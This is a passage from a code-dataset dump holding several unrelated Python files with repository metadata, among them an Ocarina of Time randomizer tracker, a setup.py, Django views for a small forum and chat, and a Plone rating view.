st.session_state.chat_history:\n chat_col.markdown(message_html(message, 'purple'),\n unsafe_allow_html=True)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Yemeen/llmwordle","sub_path":"llm_trainer.py","file_name":"llm_trainer.py","file_ext":"py","file_size_in_byte":7130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"35456505706","text":"#!/usr/bin/env python3\nimport logging\nimport os\nimport sys\nimport re\nimport argparse\nfrom CommonUtils import *\nimport datetime\n\n# Make OoTR work as a submodule in a dir called ./OoT-Randomizer\ntry:\n from World import World\nexcept ModuleNotFoundError:\n ootr_path = os.path.join(os.getcwd(), \"OoT-Randomizer\")\n if ootr_path not in sys.path:\n sys.path.append(ootr_path)\n from World import World\nfrom Utils import data_path\nfrom Dungeon import create_dungeons\nimport ItemPool\nimport TextSettings\nimport EntranceShuffle\nimport SettingsList\nfrom Item import ItemFactory\nfrom Settings import Settings, ArgumentDefaultsHelpFormatter\nfrom Region import TimeOfDay\nimport gui\nimport LocationLogic\nimport InventoryManager\nimport LocationList\n\ndrops_we_are_interested_in = 'Gold Skulltula Token'\n\nclass BadSettingsStringException(Exception):\n pass\n\ndef validate_settings_string(settings_string):\n s = Settings({})\n try:\n s.update_with_settings_string(settings_string)\n except Exception:\n return False\n return True\n\ndef getSettings(input_data, gui_dialog=None):\n parser = argparse.ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--settings_string', help='Provide sharable settings using a settings string. This will override all flags that it specifies.')\n\n args = parser.parse_args()\n\n settings = Settings({})\n settings_string = None\n if ('settings_string' in input_data) and (args.settings_string):\n a = expectOne(input_data['settings_string'])\n b = args.settings_string\n if a != b:\n raise Exception(f\"Settings string from arguments ({b}) is different from settings string from save file ({a})\")\n if 'settings_string' in input_data:\n settings_string = expectOne(input_data['settings_string'])\n elif args.settings_string is not None:\n settings_string = args.settings_string\n logging.info(f\"User has provided {settings_string} as the settings string in the arguments\")\n elif gui_dialog:\n settings_string = gui.DialogSettingsManager.get_settings_string()\n input_data['settings_string'] = [settings_string]\n logging.info(f\"User has input {settings_string} as the settings string\")\n if settings_string is None:\n raise Exception(\"Please provide settings_string as an argument or in the text file\")\n\n assert settings_string\n try:\n settings.update_with_settings_string(settings_string)\n except Exception:\n raise BadSettingsStringException(\"{} is not a valid settings string\".format(settings_string))\n if settings.starting_age not in ['child', 'adult']:\n raise Exception(\"Please set starting age to Child or Adult, then try again.\")\n return settings\n\ndef determine_mq_dungeons(world, input_data):\n # What do we know about MQs? Replace input data if we know for sure, otherwise maintain input data\n if world.settings.mq_dungeons_mode == 'mq' or (world.settings.mq_dungeons_mode == 'count' and world.settings.mq_dungeons_count == 12):\n input_data['dungeon_mqs'] = list(world.dungeon_mq.keys())\n elif world.settings.mq_dungeons_mode == 'vanilla' or (world.settings.mq_dungeons_mode == 'count' and world.settings.mq_dungeons_count == 0):\n input_data['dungeon_mqs'] = []\n elif world.settings.mq_dungeons_mode == 'specific':\n input_data['dungeon_mqs'] = world.settings.mq_dungeons_specific[:]\n elif 'dungeon_mqs' not in input_data:\n input_data['dungeon_mqs'] = []\n\n for name in world.dungeon_mq:\n world.dungeon_mq[name] = True if name in input_data['dungeon_mqs'] else False\n\ndef determine_trials(world, input_data):\n # What do we know about skipped trials? Replace input data if we know for sure, otherwise maintain input data\n if not world.settings.trials_random and world.settings.trials == 0:\n input_data['skipped_trials'] = list(world.skipped_trials.keys())\n elif not world.settings.trials_random and world.settings.trials == 6:\n input_data['skipped_trials'] = []\n elif 'skipped_trials' not in input_data:\n input_data['skipped_trials'] = []\n\n for key in world.skipped_trials.keys():\n world.skipped_trials[key] = key in input_data['skipped_trials']\n\ndef determine_dungeon_shortcuts(world, input_data):\n # What do we know about dungeon shortcuts? Replace input data if we know for sure, otherwise maintain input data\n if world.settings.dungeon_shortcuts_choice == 'choice':\n input_data['dungeon_shortcuts'] = world.settings.dungeon_shortcuts[:]\n elif world.settings.dungeon_shortcuts_choice == 'all':\n input_data['dungeon_shortcuts'] = list(world.dungeon_mq.keys())\n elif world.settings.dungeon_shortcuts_choice == 'off':\n input_data['dungeon_shortcuts'] = []\n elif 'dungeon_shortcuts' not in input_data:\n input_data['dungeon_shortcuts'] = []\n\n world.settings.dungeon_shortcuts = input_data['dungeon_shortcuts'][:]\n\ndef determine_empty_dungeons(world, input_data):\n # What do we know about dungeon shortcuts? Replace input data if we know for sure, otherwise maintain input data\n if world.settings.empty_dungeons_mode == 'specific':\n input_data['empty_dungeons'] = world.settings.empty_dungeons_specific[:]\n elif world.settings.empty_dungeons_mode == 'none':\n input_data['empty_dungeons'] = []\n elif 'empty_dungeons' not in input_data:\n input_data['empty_dungeons'] = []\n\n world.settings.empty_dungeons_specific = input_data['empty_dungeons'][:]\n\ndef generate(input_data, gui_dialog):\n settings = getSettings(input_data, gui_dialog=gui_dialog)\n\n for trick in SettingsList.logic_tricks.values():\n settings.__dict__[trick['name']] = trick['name'] in settings.allowed_tricks\n\n worlds = []\n for i in range(0, settings.world_count):\n worlds.append(World(i, settings, resolveRandomizedSettings=False))\n worlds[-1].ensure_tod_access = False\n\n for id, world in enumerate(worlds):\n determine_mq_dungeons(world, input_data)\n determine_trials(world, input_data)\n determine_dungeon_shortcuts(world, input_data)\n determine_empty_dungeons(world, input_data)\n\n # Compile the json rules based on settings\n world.ensure_tod_access=True\n\n # Load common json rule files (those used regardless of MQ status)\n if settings.logic_rules == 'glitched':\n path = 'Glitched World'\n else:\n path = 'World'\n path = data_path(path)\n\n for filename in ('Overworld.json', 'Bosses.json'):\n world.load_regions_from_json(os.path.join(path, filename))\n\n create_dungeons(world)\n world.create_internal_locations()\n\n # Populate drop items\n drop_locations = list(filter(lambda loc: loc.type == 'Drop', world.get_locations()))\n for drop_location in drop_locations:\n world.push_item(drop_location, ItemFactory(drop_location.vanilla_item, world))\n drop_location.locked = True\n # Populate fixed location items\n ItemPool.junk_pool[:] = list(ItemPool.junk_pool_base)\n if world.settings.junk_ice_traps == 'on':\n ItemPool.junk_pool.append(('Ice Trap', 10))\n elif world.settings.junk_ice_traps in ['mayhem', 'onslaught']:\n ItemPool.junk_pool[:] = [('Ice Trap', 1)]\n (pool, placed_items) = ItemPool.get_pool_core(world)\n placed_items_count = {}\n #world.itempool = ItemFactory(pool, world)\n placed_locations = list(filter(lambda loc: loc.name in placed_items, world.get_locations()))\n for location in placed_locations:\n item = placed_items[location.name]\n placed_items_count[item] = placed_items_count.get(item, 0) + 1\n world.push_item(location, ItemFactory(item, world))\n world.get_location(location).locked = True\n a = LocationList.location_table\n\n if settings.empty_dungeons_mode == 'specific':\n for k,v in LocationList.location_table.items():\n empty = False\n for dungeon in settings.empty_dungeons_specific:\n if v[5] and dungeon in v[5]:\n empty = True\n break\n if empty:\n try:\n location = world.get_location(k)\n world.push_item(location, ItemFactory('Recovery Heart', world))\n location.locked = True\n except KeyError:\n pass\n\n return world\n\n# This is very similar to Search._expand_regions()\n# Try to access all exits we have not been able to access yet\n# Output a number of changes and a list of failed exits to potentially re-try again\n# Also add any reached_regions to the list and any exits that need exploring to the list\ndef filterRegions(exit_queue, world, age, reached_regions, please_explore=True):\n failed = []\n changes = 0\n\n for exit in exit_queue:\n if exit.shuffled:\n if please_explore and exit.access_rule(world.state, spot=exit, age=age):\n exit.please_explore = True\n changes += 1\n else:\n failed.append(exit)\n continue\n\n destination = world.get_region(exit.connected_region)\n if destination in reached_regions:\n continue\n if exit.access_rule(world.state, spot=exit, age=age):\n changes += 1\n reached_regions[destination] = destination.provides_time\n reached_regions[world.get_region('Root')] |= destination.provides_time\n exit_queue.extend(destination.exits)\n else:\n failed.append(exit)\n return changes, failed\n\nitem_events = {\n 'Stop GC Rolling Goron as Adult from Goron City': 'Stop GC Rolling Goron as Adult',\n 'Odd Mushroom Access from Lost Woods' : 'Odd Mushroom Access',\n 'Poachers Saw Access from Lost Woods' : 'Poachers Saw Access',\n 'Eyedrops Access from LH Lab' : 'Eyedrops Access',\n 'Broken Sword Access from GV Fortress Side' : 'Broken Sword Access',\n 'Cojiro Access from Kakariko Village' : 'Cojiro Access',\n 'Odd Potion Access from Kak Odd Medicine Building' : 'Odd Potion Access',\n 'Prescription Access from Death Mountain Summit' : 'Prescription Access',\n 'Eyeball Frog Access from Zoras Domain' : 'Eyeball Frog Access',\n}\n\ndef doWeWantThisLoc(loc, world):\n # Deku scrubs that don't have upgrades can be ignored, but not if scrub shuffle or grotto shuffle is on\n if world.settings.shuffle_scrubs == 'off' and not world.settings.shuffle_grotto_entrances:\n if loc.filter_tags and 'Deku Scrub' in loc.filter_tags and 'Deku Scrub Upgrades' not in loc.filter_tags:\n return False\n # Generic grottos with chests are assumed to be looted immediately when you find a grotto, so ignore them\n if world.settings.shuffle_grotto_entrances:\n if loc.filter_tags and 'Grottos' in loc.filter_tags and loc.rule_string == 'True':\n return False\n # Ignore cows if cowsanity is off\n if not world.settings.shuffle_cows:\n if loc.filter_tags and 'Cow' in loc.filter_tags:\n return False\n return True\n\n# Very similar to Search.iter_reachable_locations\n# Go through the list of locked_locations and move them to the possible_locations list if accessible\ndef filterLocations(locked_locations, possible_locations, reachable_regions, state, age, world):\n changes = 0\n\n # Filter the list without removing from locked_locations\n reach_these = []\n for loc in locked_locations:\n if loc.parent_region not in reachable_regions:\n continue\n if not loc.access_rule(state, spot=loc, age=age):\n continue\n changes += 1\n if loc.name in item_events:\n state.prog_items[item_events[loc.name]] += 1\n reach_these.append(loc)\n\n # Now move items from one list to the other\n for loc in reach_these:\n locked_locations.remove(loc)\n if doWeWantThisLoc(loc, world):\n possible_locations.append(loc)\n\n return changes\n\n# If the item type is an event, fixed location, or drop, collect it automatically\ndef autocollect(possible_locations, collected_locations, state):\n collect_items = []\n move_locs = []\n\n for loc in possible_locations:\n if loc.name == 'Ganon':\n # Don't hide the wincon!\n continue\n if loc.locked and loc.item.name not in drops_we_are_interested_in:\n collect_items.append(loc.item.name)\n move_locs.append(loc)\n continue\n if loc.type == 'Event':\n collect_items.append(loc.item.name)\n move_locs.append(loc)\n continue\n if loc.type in ('HintStone', 'Drop'):\n if loc.item:\n collect_items.append(loc.item.name)\n move_locs.append(loc)\n continue\n\n for item in collect_items:\n state.prog_items[item] += 1\n for loc in move_locs:\n possible_locations.remove(loc)\n collected_locations.append(loc)\n\n return len(move_locs)\n\ndef solve(world, prog_items, starting_region='Root'):\n root_region = world.get_region(starting_region)\n reached_regions = {'child': {root_region:TimeOfDay.NONE},\n 'adult': {root_region:TimeOfDay.NONE}}\n all_locations = [x for region in world.regions for x in region.locations]\n locked_locations=all_locations[:]\n possible_locations=[]\n collected_locations=[]\n allkeys_possible_locations = []\n queues = {'child': [exit for exit in root_region.exits],\n 'adult': [exit for exit in root_region.exits]}\n\n # Provide an implementation of world.state.search.can_reach\n world.state.search = SearchClass(world, reached_regions)\n\n world.state.prog_items = prog_items.copy()\n InventoryManager.add_free_items(world, world.state.prog_items)\n\n # Map traversal\n changes = 1\n while changes:\n changes = 0\n\n for age in ['adult', 'child']:\n add_changes, queues[age] = filterRegions(queues[age], world, age, reached_regions[age], please_explore=True)\n changes += add_changes\n changes += filterLocations(locked_locations, possible_locations, reached_regions[age], world.state, age, world)\n\n changes += autocollect(possible_locations, collected_locations, world.state)\n\n if world.settings.shuffle_smallkeys in ['vanilla', 'dungeon']:\n # Give max small keys and try again, to see which locations are \"ignore small key logic\" possible\n allkeys_possible_locations = possible_locations.copy()\n allkeys_reached_regions = { 'child':reached_regions['child'].copy(),\n 'adult':reached_regions['adult'].copy()}\n key_amounts = InventoryManager.get_small_key_limits(world)\n # Free keys are given to fix the logic sometimes. So instead of comparing the current prog items,\n # Compare the base prog items amount with expected\n for key, amount in key_amounts.items():\n difference = amount - prog_items[key]\n if difference > 0:\n world.state.prog_items[key] += difference\n changes = 1\n while changes:\n changes = 0\n\n for age in ['adult', 'child']:\n add_changes, queues[age] = filterRegions(queues[age], world, age, allkeys_reached_regions[age], please_explore=False)\n changes += add_changes\n changes += filterLocations(locked_locations, allkeys_possible_locations, allkeys_reached_regions[age], world.state, age, world)\n\n changes += autocollect(allkeys_possible_locations, collected_locations, world.state)\n\n return {'possible_locations':possible_locations, 'adult_reached':reached_regions['adult'], 'child_reached':reached_regions['child'], 'allkeys_possible_locations':allkeys_possible_locations}\n\ndef get_shuffled_exits(settings):\n settings_to_types_dict = {\n 'shuffle_grotto_entrances': ['Grotto', 'Grave'],\n 'shuffle_overworld_entrances': ['Overworld'],\n 'owl_drops': ['OwlDrop'],\n 'warp_songs': ['WarpSong'],\n 'spawn_positions': ['Spawn'],\n }\n shuffled_types = []\n\n for setting, types in settings_to_types_dict.items():\n if getattr(settings, setting):\n shuffled_types.extend(types)\n\n interior_options_dict = {\n 'off': [],\n 'simple': ['Interior'],\n 'all': ['Interior', 'SpecialInterior'],\n }\n shuffled_types.extend(interior_options_dict[settings.shuffle_interior_entrances])\n\n # Complex exceptions\n if 'Grave' in shuffled_types and 'SpecialInterior' in shuffled_types:\n shuffled_types.append('SpecialGrave')\n\n if settings.shuffle_bosses != 'off':\n shuffled_types.extend(['ChildBoss', 'AdultBoss'])\n if settings.shuffle_dungeon_entrances in ['simple', 'all']:\n shuffled_types.append('Dungeon')\n if settings.shuffle_dungeon_entrances in ['all']:\n shuffled_types.append('DungeonSpecial')\n\n shuffle_these = set()\n for x in EntranceShuffle.entrance_shuffle_table:\n if x[0] not in shuffled_types:\n continue\n assert len(x) >= 2\n assert len(x) <= 3\n if len(x) == 2 and x[0] == 'Overworld' and not getattr(settings, 'decouple_entrances', False):\n # The GV Lower Stream -> Lake Hylia exit isn't shuffled unless the exits are decoupled\n continue\n shuffle_these.add(x[1][0])\n if len(x) > 2:\n shuffle_these.add(x[2][0])\n\n return shuffle_these\n\n# Mark all exits shuffled that would be shuffled according to the settings\ndef shuffleExits(world):\n shuffle_these = get_shuffled_exits(world.settings)\n all_exits = [x for region in world.regions for x in region.exits]\n for x in all_exits:\n if x.name in shuffle_these:\n x.shuffled = True\n if 'Boss Room' in x.connected_region and not x.shuffled:\n # Unshuffled boss rooms need their hint areas marked\n other_region = world.get_region(x.connected_region)\n other_region.dungeon = x.parent_region.dungeon\n\n#What to display to the user as un-collected items\ntotal_equipment = ItemPool.item_groups['ProgressItem'] + ItemPool.item_groups['Song'] + ItemPool.item_groups['DungeonReward'] + [\n'Small Key (Bottom of the Well)',\n'Small Key (Forest Temple)',\n'Small Key (Fire Temple)',\n'Small Key (Water Temple)',\n'Small Key (Shadow Temple)',\n'Small Key (Spirit Temple)',\n'Small Key (Gerudo Fortress)',\n'Small Key (Gerudo Training Ground)',\n'Small Key (Ganons Castle)',\n'Boss Key (Forest Temple)',\n'Boss Key (Fire Temple)',\n'Boss Key (Water Temple)',\n'Boss Key (Shadow Temple)',\n'Boss Key (Spirit Temple)',\n'Boss Key (Ganons Castle)',\n'Bombchu Drop',\n'Zeldas Letter',\n'Weird Egg',\n'Rutos Letter',\n'Gerudo Membership Card',\n'Deku Stick Capacity',\n'Deku Shield',\n'Gold Skulltula Token',\n'Hylian Shield',\n] + list(ItemPool.trade_items)\n\ndef getInputData(filename):\n try:\n input_data = TextSettings.readFromFile(filename)\n except FileNotFoundError:\n input_data = {}\n\n # Make some input data empty lists if they are not present\n for key in ['equipment', 'checked_off', 'one_wallet', 'two_wallets', 'known_exits', 'paired_exits']:\n if key not in input_data:\n input_data[key] = []\n\n # Remove trailing whitespace\n for key in ['checked_off', 'one_wallet', 'two_wallets']:\n input_data[key] = [re.sub(\"\\s*$\", \"\", x) for x in input_data[key]]\n\n # If any of the exits in please_explore have had their \"?\" replaced with a name, consider them a known_exits instead\n if 'please_explore' in input_data:\n migrate_these = [x for x in input_data['please_explore'] if not x.endswith(\"?\")]\n for x in migrate_these:\n input_data['please_explore'].remove(x)\n input_data['known_exits'].append(x)\n return input_data\n\nclass SearchClass():\n def __init__(self, world, reached_regions):\n self.world = world\n self.reached_regions = reached_regions\n\n def can_reach(self, region, age, tod):\n assert tod in [TimeOfDay.DAY, TimeOfDay.DAMPE]\n\n if self.reached_regions[age][region] & tod:\n return True\n\n return self.propagate_tod(self.reached_regions[age], age, tod, goal_region=region)\n\n def propagate_tod(self, regions, age, tod, goal_region):\n exit_queue = []\n for region in regions:\n if not regions[region] & tod:\n continue\n exit_queue.extend(region.exits)\n\n while len(exit_queue):\n exit = exit_queue.pop(0)\n\n if exit.shuffled:\n continue\n destination = self.world.get_region(exit.connected_region)\n if destination not in regions:\n continue\n if regions[destination] & tod:\n continue\n if exit.access_rule(self.world.state, spot=exit, age=age, tod=tod):\n regions[destination] |= tod\n if destination == goal_region:\n return True\n exit_queue.extend(destination.exits)\n return False\n\ndef startWorldBasedOnData(input_data, gui_dialog):\n world = generate(input_data, gui_dialog=gui_dialog)\n\n LocationLogic.populateKnownUnshuffled(world)\n\n # Fix the bug in World.py code\n max_tokens = 0\n if world.settings.bridge == 'tokens':\n max_tokens = max(max_tokens, world.settings.bridge_tokens)\n if world.settings.lacs_condition == 'tokens':\n max_tokens = max(max_tokens, world.settings.lacs_tokens)\n tokens = [50, 40, 30, 20, 10]\n for t in tokens:\n if f'Kak {t} Gold Skulltula Reward' not in world.settings.disabled_locations:\n max_tokens = max(max_tokens, t)\n world.max_progressions['Gold Skulltula Token'] = max_tokens\n\n # Populate starting equipment into state.prog_items\n for x in input_data['equipment']:\n world.state.prog_items[x] += 1\n if x == 'Deku Shield':\n world.state.prog_items['Buy Deku Shield'] += 1\n elif x == 'Deku Stick Capacity':\n world.state.prog_items['Deku Stick Drop'] += 1\n elif x == 'Hylian Shield':\n world.state.prog_items['Buy Hylian Shield'] += 1\n\n # Shuffle any shuffled exits, and fill in any explored exits\n shuffleExits(world)\n\n # Set price rules that we have enabled\n for name in input_data['one_wallet']:\n loc = world.get_location(name)\n wallet1 = world.parser.parse_rule('(Progressive_Wallet, 1)')\n loc.add_rule(wallet1)\n for name in input_data['two_wallets']:\n loc = world.get_location(name)\n wallet2 = world.parser.parse_rule('(Progressive_Wallet, 2)')\n loc.add_rule(wallet2)\n\n return world\n\ndef possibleLocToString(loc, world, child_reached, adult_reached):\n # TODO: see if using the subrules can be refined here?\n child = loc.parent_region in child_reached and loc.access_rule(world.state, spot=loc, age='child')\n adult = loc.parent_region in adult_reached and loc.access_rule(world.state, spot=loc, age='adult')\n assert child or adult\n\n if child and adult:\n message = \"(child or adult)\"\n elif child:\n message = \"(child)\"\n else:\n message = \"(adult)\"\n return \"{} (in {}) {}\".format(loc, loc.parent_region, message)\n\ndef writeResultsToFile(world, input_data, output_data, output_known_exits, filename, output_known_exit_pairs, priorities=None):\n # Propagate input data to output\n for key in ['equipment', 'checked_off', 'one_wallet', 'two_wallets', 'dungeon_mqs']:\n output_data[key] = input_data[key]\n output_data['settings_string'] = [world.settings.settings_string]\n\n # Build possible equipment list as a suggestion for items which have not been collected yet\n possible_equipment = total_equipment[:]\n for x in output_data['equipment']:\n try:\n possible_equipment.remove(x)\n except ValueError:\n pass\n output_data['possible_equipment'] = possible_equipment\n\n # Find the names of the possible locations (minus the checked off ones)\n # Then reconstruct their order using the master list\n p = set([x.name for x in output_data['possible_locations']])\n for name in input_data['checked_off']:\n try:\n p.remove(name)\n except KeyError:\n pass\n locs = [x for x in world.get_locations() if x.name in p]\n output_data['possible_locations'] = [possibleLocToString(x, world, output_data['child_reached'], output_data['adult_reached']) for x in locs]\n\n # Turn the known_exits data into formatted text\n #output_data = output_data | exit_information_to_text(all_exits, output_known_exits, output_known_exit_pairs)\n # TODO: clean this up later\n output_data['known_exits'] = output_known_exits\n output_data['paired_exits'] = output_known_exit_pairs\n\n # Output data that we don't want\n del output_data['child_reached']\n del output_data['adult_reached']\n\n if priorities is None:\n priorities = [\"settings_string\", \"possible_locations\", \"known_exits\", \"other_shuffled_exits\"]\n TextSettings.writeToFile(output_data, filename, priorities)\n\ndef formatPairedExits(known_exit_twins):\n items = list(known_exit_twins.keys())\n assert len(items) % 2 == 0\n\n result = []\n while len(items):\n item1 = items.pop(0)\n item2 = known_exit_twins[item1]\n items.remove(item2)\n result.append(\"{} pairswith {}\".format(item1, item2))\n\n return result\n\n# Turn the known-exit dictionaries into text\ndef exit_information_to_text(all_exits, known_exits, known_exit_pairs):\n known_exits = [\"{} goesto {}\".format(exit.name, known_exits[exit.name]) for exit in all_exits if exit.name in known_exits and exit.name not in known_exit_pairs]\n paired_exits = formatPairedExits(known_exit_pairs)\n return {'known_exits':known_exits, 'paired_exits':paired_exits}\n\n\ndef textmode(filename):\n input_data = getInputData(filename)\n world, output_known_exits = startWorldBasedOnData(input_data)\n output_data = solve(world)\n writeResultsToFile(world, input_data, output_data, output_known_exits, filename)\n\nif __name__ == \"__main__\":\n # Log to stderr and file\n log_dir = 'Logs'\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n logfile_name = datetime.datetime.now().strftime('logfile_%Y-%m-%d %H-%M-%S.log')\n logfile_name = os.path.join(log_dir, logfile_name)\n logging.basicConfig(handlers=[logging.FileHandler(logfile_name), logging.StreamHandler()], level=logging.INFO)\n\n # Parse command line arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('--textmode', action=\"store_true\")\n parser.add_argument('--filename', type=str, default=\"output.txt\")\n parser.add_argument('--settings_string', help='Provide sharable settings using a settings string. This will override all flags that it specifies.')\n args = parser.parse_args()\n\n # Launch gui or text mode\n if args.textmode:\n textmode(args.filename)\n else:\n gui.main(args.filename)\n","repo_name":"hoodedpaladin/HoodTracker","sub_path":"HoodTracker.py","file_name":"HoodTracker.py","file_ext":"py","file_size_in_byte":27153,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"}
+{"seq_id":"23763239711","text":"#!/usr/bin/env python\nfrom setuptools import setup, find_packages\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\nlong_description = \"Datajoint schemata and code for neuroscientific experiments in the Tolias lab.\"\n\n\nsetup(\n name='commons',\n version='0.1.0.dev1',\n description=\"A collection of datajoint schemas and analysis code.\",\n long_description=long_description,\n author='Fabian Sinz',\n author_email='sinz@bcm.edu',\n license=\"Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License\",\n url='https://github.com/atlab/commons',\n keywords='database organization',\n packages=find_packages(exclude=['contrib', 'docs', 'tests*']),\n # dependency_links = ['https://github.com/datajoint/datajoint-python/tarball/master#egg=datajoint-0.1.0beta'],\n install_requires=[],\n classifiers=[\n 'Development Status :: 1 - Beta',\n 'Intended Audience :: Science/Research',\n 'Programming Language :: Python :: 3 :: Only',\n 'License :: OSI Approved :: Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License',\n 'Topic :: Database :: Front-Ends',\n ],\n)\n","repo_name":"atlab/commons","sub_path":"python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"4506845208","text":"from django.shortcuts import render\nfrom django.shortcuts import render_to_response\nfrom django.shortcuts import HttpResponse\nfrom django.shortcuts import redirect\nfrom django.core import serializers\nfrom app1 import models\nimport datetime\nimport json\n# Create your views here.\n\n\ndef Filter(before_func, after_func):\n def outer(main_func):\n def wrapper(request, *args, **kwargs):\n before_result = before_func(request, *args, **kwargs)\n if(before_result != None):\n return before_result\n main_result = main_func(request, *args, **kwargs)\n if(main_result != None):\n return main_result\n after_result = after_func(request, *args, **kwargs)\n if(after_result != None):\n return after_result\n return wrapper\n return outer\n\n\ndef before(request):\n data = {'status': 0, 'message':''}\n if 'current_user_id' not in request.session:\n data['message'] = '请先登录!'\n return HttpResponse(json.dumps(data))\n\n\ndef after(request):\n pass\n\n\ndef login(request):\n if request.method == \"POST\":\n username = request.POST.get('username')\n password = request.POST.get('password')\n try:\n currentObj = models.Admin.objects.get(username=username,password=password)\n except Exception as e:\n currentObj = None\n if currentObj:\n request.session['current_user_id'] = currentObj.id\n return redirect('/index/')\n else:\n data = {'message': '用户名或密码错误!'}\n return render_to_response('login.html')\n return render_to_response('login.html')\n\n\ndef index(request):\n all_data = models.News.objects.all().order_by('-create_date')\n return render_to_response('index.html',{'data': all_data})\n\n\ndef addfavor(request):\n ret = {'status':0, 'data':'', 'message':''}\n try:\n id = request.POST.get('nid')\n newsObj = models.News.objects.get(id=id)\n temp = newsObj.favor_count + 1\n newsObj.favor_count = temp\n newsObj.save()\n ret['status'] = 1\n ret['data'] = temp\n except Exception as e:\n ret['message'] = e.args\n return HttpResponse(json.dumps(ret))\n\n\nclass CJsonEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, datetime.datetime):\n return o.strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(o, date):\n return o.strftime(\"%Y-%m-%d\")\n else:\n return json.JSONEncoder.default(self, o)\n\n\ndef getreply(request):\n id = request.POST.get('nid')\n reply_list = models.Reply.objects.filter(new__id=id).values('id','content','create_date','user__username')\n reply_list = list(reply_list)\n return HttpResponse(json.dumps(reply_list,cls=CJsonEncoder))\n\n\n@Filter(before, after)\ndef submitreply(request):\n ret = {'status':0, 'data':'', 'message':''}\n try:\n nid = request.POST.get('nid')\n data = request.POST.get('data')\n newObj = models.News.objects.get(id=nid)\n obj = models.Reply.objects.create(content=data,\n user=models.Admin.objects.get(id=request.session['current_user_id']),\n new=models.News.objects.get(id=nid))\n temp = newObj.reply_count + 1\n newObj.reply_count = temp\n newObj.save()\n ret['status'] = 1\n ret['data'] = {'content': obj.content, 'user_username':obj.user.username,\n 'create_date': obj.create_date.strftime('%Y-%m-%d %H:%M:%S'),\n 'reply_count':temp}\n except Exception as e:\n ret['message'] = e.args\n return HttpResponse(json.dumps(ret))\n\n\n@Filter(before, after)\ndef submitchat(request):\n ret = {'status': 0, 'data': '', 'message': ''}\n try:\n value = request.POST.get('data')\n chatObj = models.Chat.objects.create(content=value,\n user=models.Admin.objects.get(id=request.session['current_user_id']),\n )\n ret['status']=1\n ret['data']={\n 'id': chatObj.id,\n 'username': chatObj.user.username,\n 'content':chatObj.content,\n 'create_date':chatObj.create_date.strftime('%Y-%m-%d %H:%M:%S')\n }\n except Exception as e:\n ret['message']=e.args\n return HttpResponse(json.dumps(ret))\n\n\ndef getchat(request):\n chatObj = models.Chat.objects.all().order_by('-id')[0:10].values('id', 'content', 'user__username', 'create_date')\n chatObj = list(chatObj)\n chatObj = json.dumps(chatObj, cls=CJsonEncoder)\n return HttpResponse(chatObj)\n\n\ndef getchat2(request):\n last_id = request.POST.get('last_id')\n chatObj = models.Chat.objects.filter(id__gt=last_id).values('id', 'content', 'user__username', 'create_date')\n chatObj = list(chatObj)\n chatObj = json.dumps(chatObj, cls=CJsonEncoder)\n return HttpResponse(chatObj)\n\n\n@Filter(before, after)\ndef username(request):\n data = {'status':1, 'user': ''}\n id = request.session['current_user_id']\n data['user'] = models.Admin.objects.get(id=id).username\n return HttpResponse(json.dumps(data))\n\n\ndef logout(request):\n try:\n del request.session['current_user_id']\n return HttpResponse(json.dumps(None))\n except Exception as e:\n return HttpResponse(json.dumps(e.args))\n\n\ndef dragon(request):\n return render_to_response('dragon.html')","repo_name":"dragonMar/BBS","sub_path":"app1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"30399814035","text":"import json\nfrom Products.Five.browser import BrowserView\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom zope.component import getMultiAdapter\nfrom cioppino.twothumbs import _\nfrom cioppino.twothumbs import rate\n\nclass LikeThisShizzleView(BrowserView):\n \"\"\" Update the like/unlike status of a product via AJAX \"\"\"\n\n def __call__(self, REQUEST, RESPONSE):\n form = self.request.form\n if form.get('form.lovinit', False):\n rate.loveIt(self.context)\n # vipod: additionally re-index a few more indexes\n self.context.reindexObject(idxs=['avg_ratings',\n 'total_down_ratings'])\n elif form.get('form.hatedit', False):\n rate.hateIt(self.context)\n # vipod: additionally re-index a few more indexes\n self.context.reindexObject(idxs=['avg_ratings',\n 'total_down_ratings'])\n else:\n return _(u\"We don't like ambiguity around here. \"\n \"Check yo self before you wreck yo self.\")\n\n tally = rate.getTally(self.context)\n RESPONSE.setHeader('Content-Type', 'application/javascript')\n return json.dumps(tally)\n","repo_name":"vnc-biz/vnccollab.theme","sub_path":"vnccollab/theme/browser/like.py","file_name":"like.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"2328235820","text":"from django.shortcuts import get_object_or_404,render,redirect,render_to_response\nfrom .models import Topic,TopicComment,LikeTopic,LikeTopicComment\nfrom .forms import TopicCreateForm,TopicCommentForm\nfrom django.http import JsonResponse\nfrom django.db.models import Count\nfrom django.core.paginator import Paginator\nfrom django.db.models import Q\n\n# Create your views here.\ndef community(request):\n topicform = TopicCreateForm()\n topics = Topic.objects.all()[:20]\n # 筛选出评论最多的十个话题\n # 首先根据TopicComment表中计算出每个话题的评论数,然后根据评论数进行排序,并取前十个\n hot_topics = Topic.objects.annotate(comment_count=Count(\"topiccomment__topic\")).order_by('-comment_count')[0:10]\n \n context = {}\n context['hot_topics'] = hot_topics\n context['topicform'] = topicform\n context['topics'] = topics\n return render(request,'community_home.html',context)\n\n\ndef topic_create(request):\n user = request.user\n topicform = TopicCreateForm()\n # print(user.username)\n topic_form = TopicCreateForm(request.POST, request.FILES)\n if topic_form.is_valid(): \n topic_title = topic_form.cleaned_data['topic_title']\n content = topic_form.cleaned_data['content']\n category = topic_form.cleaned_data['category']\n 